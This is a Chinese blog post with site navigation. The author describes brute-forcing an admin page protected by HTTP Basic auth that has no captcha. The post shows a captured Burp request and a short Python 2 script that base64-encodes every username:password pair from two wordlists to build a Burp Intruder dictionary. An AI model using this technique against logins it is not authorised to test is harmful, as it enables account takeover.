爆破字典生成小脚本(新手学python)

qileilove

blog已经转移至github,大家请访问 http://qaseven.github.io/

遇到一套系统，后台管理登录无验证码，准备爆破试试，burp抓到的包如下：

GET /admin/ HTTP/1.1

Host: www.nxadmin.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

If-Modified-Since: Wed, 07 May 2014 03:04:54 GMT

If-None-Match: W/"37424//"

Authorization: Basic MTExOjIyMg==

　　发现有一串base64编码处理的，解码之后正是提交的帐号:密码的组合，只好写个小脚本将已有的字典文件进行处理了，贴上代码：

#coding:utf-8

import sys

import base64

if len(sys.argv)<3:

print "Usage:"+" admincrack.py "+"userlist "+"passlist"

sys.exit()

def admincrack(userfile,passfile):

uf=open(userfile,'r')

pf=open(passfile,'r')

for user in uf.readlines():

#指定指针的位置,不指定只会遍历userfile中的第一行

pf.seek(0)

for passwd in pf.readlines():

user=user.strip("\r\n")

passwd=passwd.strip("\r\n")

hashvul=user+':'+passwd

base64hash=base64.b64encode(hashvul)

print user,passwd,base64hash

if __name__=="__main__":

admincrack(sys.argv[1],sys.argv[2])

　　生成之后先将base64hash打印出来，就会构成intruder用到的字典，再将user,passwd,base64hash一起打印出来，构成后期爆破成功需要查询对应帐号和密码明文的字典。

posted on 2014-12-11 23:31 顺其自然EVO 阅读(350) 评论(0) 编辑收藏所属分类: 测试学习专栏

新用户注册刷新评论列表


只有注册用户登录后才能发表评论。




网站导航: 博客园 IT新闻知识库 C++博客博问管理
相关文章: 如何进行Web服务的性能测试？利用drozer进行Android渗透测试 Appium Android Bootstrap源码分析之命令解析执行 Fliptest—iOS 的应用A/B测试框架 iOS功能测试工具 Frank iOS单元测试框架Kiwi for iOS Appium Android Bootstrap之控件AndroidElement 移动应用测试框架—Calabash Android 简介 Appium Server源码分析之作为Bootstrap客户端移植MonkeyRunner的图片对比功能实现-Appium篇

qileilove

爆破字典生成小脚本(新手学python)

导航

统计

常用链接

留言簿(55)

随笔分类

随笔档案

文章分类

文章档案

搜索

最新评论

阅读排行榜

评论排行榜